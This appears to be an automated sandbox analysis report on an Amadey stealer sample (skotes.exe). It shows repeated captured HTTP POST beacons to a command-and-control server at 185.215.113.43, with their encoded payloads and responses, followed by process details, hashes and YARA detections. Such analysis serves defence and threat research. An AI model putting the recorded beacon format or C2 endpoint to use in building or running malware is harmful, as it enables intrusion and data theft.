1	192.168.2.8	49710	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:07.725120068 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:09.149262905 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49711	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:10.897082090 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:09:12.259918928 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49712	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:13.881902933 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:15.246069908 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:16.992872000 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:09:18.361529112 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:19.991131067 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:21.332242012 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49715	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:23.084517002 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:09:24.430284977 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49716	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:26.053617954 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:27.407341003 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49718	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:29.148916960 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:09:30.551928997 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49720	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:32.178813934 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:33.530127048 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49721	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:35.294748068 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:09:36.648319960 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49722	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:38.272156000 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:39.651995897 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49723	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:41.398930073 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:09:42.738420010 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49724	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:44.367697954 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:45.725827932 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49725	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:47.491126060 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:09:48.838783979 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49726	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:50.477078915 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:51.827888966 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49727	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:53.570368052 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:09:54.920331955 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49728	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:56.554217100 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:09:57.899444103 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:09:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49729	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:09:59.649506092 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:10:01.005407095 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:10:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49730	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:10:02.678082943 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:10:04.056854963 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:10:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49732	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:10:07.339086056 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 20, 2024 16:10:08.680332899 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:10:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49733	185.215.113.43	80	2216	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:10:11.373759985 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 20, 2024 16:10:12.717416048 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:10:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Target ID:	0
Start time:	10:08:06
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\UyiH4t5dph.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UyiH4t5dph.exe"
Imagebase:	0x2d0000
File size:	2'990'592 bytes
MD5 hash:	9D38889192A887E1128EC41DD417FB6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1424348425.0000000005290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:08:09
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xbe0000
File size:	2'990'592 bytes
MD5 hash:	9D38889192A887E1128EC41DD417FB6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1452607613.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:09:00
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xbe0000
File size:	2'990'592 bytes
MD5 hash:	9D38889192A887E1128EC41DD417FB6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
